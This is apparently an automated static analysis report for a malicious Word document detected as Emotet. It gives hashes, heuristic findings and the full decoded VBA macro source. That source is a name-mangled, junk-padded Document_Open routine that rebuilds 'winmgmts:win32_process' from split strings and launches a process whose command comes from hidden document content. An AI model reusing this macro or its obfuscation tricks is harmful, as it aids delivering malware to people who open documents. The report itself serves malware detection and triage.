Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 b793e4a37777e216…

MALICIOUS

Office (OLE) / .DOC

133.5 KB Created: 2020-10-14 15:28:00 Authoring application: Microsoft Office Word First seen: 2026-06-26
MD5: 74654257c09adf1eb6fe670c3f6ffbfb SHA-1: 69ec1f5c67c4c8259e292a429951ae86a2af89f3 SHA-256: b793e4a37777e216cd8f84e2831e9142fa4994af300c251cd828c2f1008329e5
172 Risk Score

Heuristics 7

  • ClamAV: Doc.Malware.Emotet-9777973-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emotet-9777973-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set N_9qb2sxwkm = CreateObject(I_x55r1rwdpbsw_a)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9715 bytes
SHA-256: 9e027f2406dbf600081423755bad65268b2cef37b5adb7a79b070c72ddd5d020
Detection
ClamAV: No threats found
Obfuscation or payload: likely
70 of 134 identifiers look randomly generated (e.g. 'L3rbvh_1kgr_3tdxtb') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Znijog1trmkmi"
Function F4_03bjrry3or1n(Vum2asv7sthtfnmwx0)
On Error Resume Next
   Dim ENgFEB()
ReDim ENgFEB(1)
ENgFEB(0) = 2 + 3
Dim uqVMIKBJ()
ReDim uqVMIKBJ(1)
uqVMIKBJ(0) = 440 + 2463
Dim SwVqBD()
ReDim SwVqBD(2)
SwVqBD(0) = 4 + 74781
SwVqBD(1) = 8 + 1
F4_03bjrry3or1n = Join(Vum2asv7sthtfnmwx0, Zwe7fd_qm4vmqe4m)
   Dim LUPFA()
ReDim LUPFA(1)
LUPFA(0) = 3 + 138
Dim nvZoAZY()
ReDim nvZoAZY(3)
nvZoAZY(0) = 45 + 51
nvZoAZY(1) = 18 + 11
nvZoAZY(2) = 2 + 5
Dim fMhxLCYE()
ReDim fMhxLCYE(3)
fMhxLCYE(0) = 33 + 31
fMhxLCYE(1) = 416 + 501
fMhxLCYE(2) = 8066 + 4
End Function
Function N_9qb2sxwkm(I_x55r1rwdpbsw_a)
On Error Resume Next
   Dim NaMiJEH()
ReDim NaMiJEH(3)
NaMiJEH(0) = 8980 + 61
NaMiJEH(1) = 5 + 61
NaMiJEH(2) = 5 + 3514
Dim iBWhS()
ReDim iBWhS(2)
iBWhS(0) = 5 + 61
iBWhS(1) = 7 + 91
Dim xCKvDACA()
ReDim xCKvDACA(3)
xCKvDACA(0) = 5 + 81
xCKvDACA(1) = 536 + 11
xCKvDACA(2) = 6 + 3596
Set N_9qb2sxwkm = CreateObject(I_x55r1rwdpbsw_a)
   Dim VGMvJJBf()
ReDim VGMvJJBf(2)
VGMvJJBf(0) = 26 + 44851
VGMvJJBf(1) = 7 + 9
Dim dZGFECsF()
ReDim dZGFECsF(3)
dZGFECsF(0) = 4 + 291
dZGFECsF(1) = 2 + 601
dZGFECsF(2) = 7 + 8
Dim sAaeICS()
ReDim sAaeICS(1)
sAaeICS(0) = 661 + 952
End Function
Function Apilvp9e1mn8l(Bgwhviawrvfbs2vw6)
On Error Resume Next
   Dim UKSifOdI()
ReDim UKSifOdI(1)
UKSifOdI(0) = 1574 + 691
Dim ONpPI()
ReDim ONpPI(1)
ONpPI(0) = 78 + 8
Dim MkkQH()
ReDim MkkQH(2)
MkkQH(0) = 7 + 81
MkkQH(1) = 6 + 8
Apilvp9e1mn8l = Split(Bgwhviawrvfbs2vw6, "=EGR")
   Dim vkwno()
ReDim vkwno(3)
vkwno(0) = 7170 + 1701
vkwno(1) = 703 + 54501
vkwno(2) = 4 + 6
Dim hpPCIfIdA()
ReDim hpPCIfIdA(2)
hpPCIfIdA(0) = 951 + 221
hpPCIfIdA(1) = 563 + 8033
Dim uFglFJGz()
ReDim uFglFJGz(2)
uFglFJGz(0) = 170 + 41
uFglFJGz(1) = 2 + 1
End Function

Attribute VB_Name = "Wtjfn_0g4qan4sf"
Attribute VB_Base = "0{8C441DB7-AB91-431C-9406-1B512FD9A931}{E77E4D53-9B7D-44A1-AA51-BCCE516683B9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function X8vfudkj36sp8()
On Error Resume Next
   Dim KEpfrIi()
ReDim KEpfrIi(3)
KEpfrIi(0) = 1 + 261
KEpfrIi(1) = 3245 + 31
KEpfrIi(2) = 7 + 1
Dim RIPSRJkJ()
ReDim RIPSRJkJ(2)
RIPSRJkJ(0) = 5 + 21
RIPSRJkJ(1) = 45 + 40
Dim rMtonRr()
ReDim rMtonRr(3)
rMtonRr(0) = 7 + 38981
rMtonRr(1) = 155 + 971
rMtonRr(2) = 2 + 2
J_nlq9yfu8htd = N_ov0lkhlprfzyhb + "=EGRro=EGR=EGRce=EGRs=EGRs=EGR" + L9sl8_sqonqoum_ku
   Dim XkjrylDoH()
ReDim XkjrylDoH(2)
XkjrylDoH(0) = 54 + 11
XkjrylDoH(1) = 3 + 84
Dim OSyeHUC()
ReDim OSyeHUC(2)
OSyeHUC(0) = 64 + 11
OSyeHUC(1) = 3556 + 4794
Dim vDoIJPuBz()
ReDim vDoIJPuBz(3)
vDoIJPuBz(0) = 4 + 71
vDoIJPuBz(1) = 2 + 51
vDoIJPuBz(2) = 9 + 4081
I7o24xkcuqtaxnppdo = Wu9xo2y8eho1 + "=EGR=EGR:=EGRw=EGRin=EGR=EGR3=EGR2=EGR_=EGR" + Zeooz1nxa8fv0642dr
   Dim kiIWpUE()
ReDim kiIWpUE(1)
kiIWpUE(0) = 2 + 1
Dim hRmoJHd()
ReDim hRmoJHd(2)
hRmoJHd(0) = 68 + 41011
hRmoJHd(1) = 425 + 9
Dim ZLyHhUBoP()
ReDim ZLyHhUBoP(2)
ZLyHhUBoP(0) = 5607 + 61
ZLyHhUBoP(1) = 9 + 7
Bgwhviawrvfbs2vw6 = Dtmr64u2x_7lcynqjg + "=EGR=EGRw=EGRi=EGRnm=EGR=EGRgm=EGRt=EGR=EGR" + Hugs6y4cp77fb1svqy
   Dim TVpgoY()
ReDim TVpgoY(3)
TVpgoY(0) = 571 + 71
TVpgoY(1) = 9 + 981
TVpgoY(2) = 620 + 5678
Dim oBYBJ()
ReDim oBYBJ(2)
oBYBJ(0) = 881 + 61
oBYBJ(1) = 4 + 27
Dim LVQNS()
ReDim LVQNS(2)
LVQNS(0) = 11 + 91
LVQNS(1) = 548 + 500
Upxwm87i42mh5j = Wtjfn_0g4qan4sf.Cpmcl8ozmbbkm__9.Pages(1).Caption
   Dim BAZqiA()
ReDim BAZqiA(3)
BAZqiA(0) = 5 + 5101
BAZqiA(1) = 184 + 31
BAZqiA(2) = 92 + 5585
Dim zHIzA()
ReDim zHIzA(3)
zHIzA(0) = 38 + 31
zHIzA(1) = 618 + 981
zHIzA(2) = 96 + 9
Dim bFYgGCAi()
ReDim bFYgGCAi(2)
bFYgGCAi(0) = 5554 + 361
bFYgGCAi(1) = 3 + 32
L3rbvh_1kgr_3tdxtb = Bgwhviawrvfbs2vw6 + Upxwm87i42mh5j + I7o24xkcuqtaxnppdo + Wtjfn_0g4qan4sf.Y5p2hejhd9135 + J_nlq9yfu8htd
   Dim TRlEDGN()
ReDim TRlEDGN(1)
TRlEDGN(0) = 8 + 2760
Dim qPCrG()
ReDim qPCrG(1)
qPCrG(0) = 321 + 97
Dim oXgoIBg()
ReDim oXgoIBg(2)
oXgoIBg(0) = 746 + 54811
oXgoIBg(1) = 1 + 9
Bdm0b4f5b9x6dc8 = X73i62ecogoc(L3rbvh_1kgr_3tdxtb)
   Dim gzBoIBCAB()
ReDim gzBoIBCAB(1)
gzBoIBCAB(0) = 951 + 9985
Dim ZpKkJBoH()
ReDim ZpKkJBoH(3)
ZpKkJBoH(0) = 467 + 41
ZpKkJBoH(1) = 33 + 11
ZpKkJBoH(2) = 53 + 525
Dim FGSzID()
ReDim FGSzID(1)
FGSzID(0) = 66 + 488
Set Mvjm_k2kfu7vvw = CreateObject(Bdm0b4f5b9x6dc8)
   Dim XXXIDIB()
ReDim XXXIDIB(1)
XXXIDIB(0) = 4 + 9
Dim CWRTS()
ReDim CWRTS(2)
CWRTS(0) = 493 + 381
CWRTS(1) = 8 + 2
Dim lXDdF()
ReDim lXDdF(1)
lXDdF(0) = 4 + 97
Vum2asv7sthtfnmwx0 = Nwf02xewd9vptveh + Bdm0b4f5b9x6dc8 + Upxwm87i42mh5j + Wtjfn_0g4qan4sf.Sw9eaedqfsb3t + Wtjfn_0g4qan4sf.Fqn9_7v0m3u1i
   Dim UIMICIaBF()
ReDim UIMICIaBF(3)
UIMICIaBF(0) = 3 + 91
UIMICIaBF(1) = 3554 + 61
UIMICIaBF(2) = 5 + 9
Dim QoJoZEI()
ReDim QoJoZEI(2)
QoJoZEI(0) = 4075 + 3811
QoJoZEI(1) = 85 + 3
Dim zBGhFTEF()
ReDim zBGhFTEF(2)
zBGhFTEF(0) = 9 + 51
zBGhFTEF(1) = 843 + 2
Set Ehmptdhe60ex = Xh6_tk2v0qyptvbaxh(Vum2asv7sthtfnmwx0 + Wtjfn_0g4qan4sf.Y5p2hejhd9135)
   Dim dKCpBE()
ReDim dKCpBE(3)
dKCpBE(0) = 29 + 71
dKCpBE(1) = 3 + 25181
dKCpBE(2) = 6 + 6065
Dim auHUCGBCe()
ReDim auHUCGBCe(3)
auHUCGBCe(0) = 2 + 41
auHUCGBCe(1) = 6458 + 91961
auHUCGBCe(2) = 17 + 1
Dim acClFBY()
ReDim acClFBY(2)
acClFBY(0) = 7102 + 5501
acClFBY(1) = 4 + 2
Ngxxpgaj50l3hb_l = Mid(CVar(Lbdzt_ageomrk56ke.Sections(1)), 5, Len(CVar(Lbdzt_ageomrk56ke.Sections(1))))
   Dim UvneE()
ReDim UvneE(2)
UvneE(0) = 4 + 8241
UvneE(1) = 9818 + 905
Dim rllxADIDb()
ReDim rllxADIDb(1)
rllxADIDb(0) = 8 + 37
Dim UVPDW()
ReDim UVPDW(3)
UVPDW(0) = 3959 + 81
UVPDW(1) = 159 + 7551
UVPDW(2) = 1975 + 84
   Dim BzeBSNF()
ReDim BzeBSNF(2)
BzeBSNF(0) = 2 + 51
BzeBSNF(1) = 555 + 8580
Dim AFLJbsB()
ReDim AFLJbsB(3)
AFLJbsB(0) = 1546 + 951
AFLJbsB(1) = 2 + 54951
AFLJbsB(2) = 583 + 1
Dim pyLNIDLGF()
ReDim pyLNIDLGF(2)
pyLNIDLGF(0) = 5 + 61
pyLNIDLGF(1) = 6 + 218
Mvjm_k2kfu7vvw.Create X73i62ecogoc(Ngxxpgaj50l3hb_l), Ybs5c1e7366vu, Ehmptdhe60ex
   Dim cRIEAAEgI()
ReDim cRIEAAEgI(2)
cRIEAAEgI(0) = 915 + 8121
cRIEAAEgI(1) = 506 + 1
Dim PlFnxpXEH()
ReDim PlFnxpXEH(2)
PlFnxpXEH(0) = 2 + 71
PlFnxpXEH(1) = 25 + 7
Dim vezqCbG()
ReDim vezqCbG(3)
vezqCbG(0) = 7597 + 91
vezqCbG(1) = 30 + 71
vezqCbG(2) = 3 + 7532
   Dim YqrFJLCF()
ReDim YqrFJLCF(2)
YqrFJLCF(0) = 5 + 24451
YqrFJLCF(1) = 807 + 76
Dim iNzhI()
ReDim iNzhI(2)
iNzhI(0) = 9 + 621
iNzhI(1) = 58 + 3
Dim YLXjmHHRn()
ReDim YLXjmHHRn(3)
YLXjmHHRn(0) = 3791 + 4241
YLXjmHHRn(1) = 43 + 51
YLXjmHHRn(2) = 4 + 3
End Function
Function Xh6_tk2v0qyptvbaxh(Aw04j9ga5y8mol)
On Error Resume Next
   Dim IbSGs()
ReDim IbSGs(2)
IbSGs(0) = 335 + 91
IbSGs(1) = 9 + 1
Dim APGOVIE()
ReDim APGOVIE(2)
APGOVIE(0) = 4 + 311
APGOVIE(1) = 6 + 2
Dim PjvcoAiH()
ReDim PjvcoAiH(1)
PjvcoAiH(0) = 1 + 94
Set Xh6_tk2v0qyptvbaxh = Znijog1trmkmi.N_9qb2sxwkm(X3wxmfvq61c + Aw04j9ga5y8mol + D5rmv8tgxpf5r7ad)
   Dim wutoDoA()
ReDim wutoDoA(3)
wutoDoA(0) = 3 + 1571
wutoDoA(1) = 757 + 61391
wutoDoA(2) = 161 + 3
Dim AGPsySjrR()
ReDim AGPsySjrR(1)
AGPsySjrR(0) = 7 + 480
Dim oPZPDMBFr()
ReDim oPZPDMBFr(3)
oPZPDMBFr(0) = 42 + 61
oPZPDMBFr(1) = 28 + 41651
oPZPDMBFr(2) = 3 + 28
Xh6_tk2v0qyptvbaxh. _
showwindow = Ukat5yx804b2sg33nw + Kqj0cnqsx4fqe + Mcqbgkg5pxdrpf + Jbek2zttl0fo + Ae4m9jaem1gl + Pax6v0ljj2b
   Dim KwUhGH()
ReDim KwUhGH(2)
KwUhGH(0) = 1111 + 41
KwUhGH(1) = 6307 + 26
Dim BIglrOI()
ReDim BIglrOI(3)
BIglrOI(0) = 927 + 64411
BIglrOI(1) = 197 + 54801
BIglrOI(2) = 8 + 247
Dim uWueFllH()
ReDim uWueFllH(1)
uWueFllH(0) = 71 + 3
End Function
Function X73i62ecogoc(Y15p3cfhci78rq)
On Error Resume Next
   Dim pTrhHN()
ReDim pTrhHN(2)
pTrhHN(0) = 9997 + 31651
pTrhHN(1) = 5 + 202
Dim WNipXLJ()
ReDim WNipXLJ(3)
WNipXLJ(0) = 3 + 5031
WNipXLJ(1) = 816 + 8861
WNipXLJ(2) = 9 + 9
Dim KudpECqAF()
ReDim KudpECqAF(3)
KudpECqAF(0) = 8 + 51
KudpECqAF(1) = 1 + 6101
KudpECqAF(2) = 3638 + 5
Hpiyo7_6sxq2 = (Y15p3cfhci78rq)
   Dim yNcNCEC()
ReDim yNcNCEC(2)
yNcNCEC(0) = 9866 + 8591
yNcNCEC(1) = 136 + 1
Dim RooHFpJ()
ReDim RooHFpJ(3)
RooHFpJ(0) = 1961 + 54861
RooHFpJ(1) = 7 + 471
RooHFpJ(2) = 155 + 95
Dim ujANoD()
ReDim ujANoD(3)
ujANoD(0) = 12 + 63931
ujANoD(1) = 397 + 9501
ujANoD(2) = 1 + 96
Qbij1bpl9ovcmk9 = Znijog1trmkmi.Apilvp9e1mn8l(Hpiyo7_6sxq2)
   Dim Ldxxy()
ReDim Ldxxy(1)
Ldxxy(0) = 1683 + 52
Dim UkXzrHfB()
ReDim UkXzrHfB(3)
UkXzrHfB(0) = 4 + 9391
UkXzrHfB(1) = 451 + 251
UkXzrHfB(2) = 7 + 79
Dim JxWJU()
ReDim JxWJU(2)
JxWJU(0) = 4047 + 91
JxWJU(1) = 6011 + 9507
Bejelo6zhyl5re5fku = Znijog1trmkmi.F4_03bjrry3or1n(Qbij1bpl9ovcmk9)
   Dim gdlKi()
ReDim gdlKi(3)
gdlKi(0) = 5325 + 7391
gdlKi(1) = 7 + 61
gdlKi(2) = 3462 + 5
Dim uRyTGXf()
ReDim uRyTGXf(1)
uRyTGXf(0) = 9 + 3
Dim KzgrG()
ReDim KzgrG(2)
KzgrG(0) = 3 + 911
KzgrG(1) = 2 + 76
X73i62ecogoc = Bejelo6zhyl5re5fku
   Dim eEdflKDWJ()
ReDim eEdflKDWJ(2)
eEdflKDWJ(0) = 9253 + 981
eEdflKDWJ(1) = 2 + 1879
Dim aozpM()
ReDim aozpM(2)
aozpM(0) = 2 + 91
aozpM(1) = 9 + 2
Dim xZCoCLGD()
ReDim xZCoCLGD(2)
xZCoCLGD(0) = 5525 + 3751
xZCoCLGD(1) = 57 + 971
End Function


Attribute VB_Name = "Lbdzt_ageomrk56ke"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Wtjfn_0g4qan4sf.X8vfudkj36sp8
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.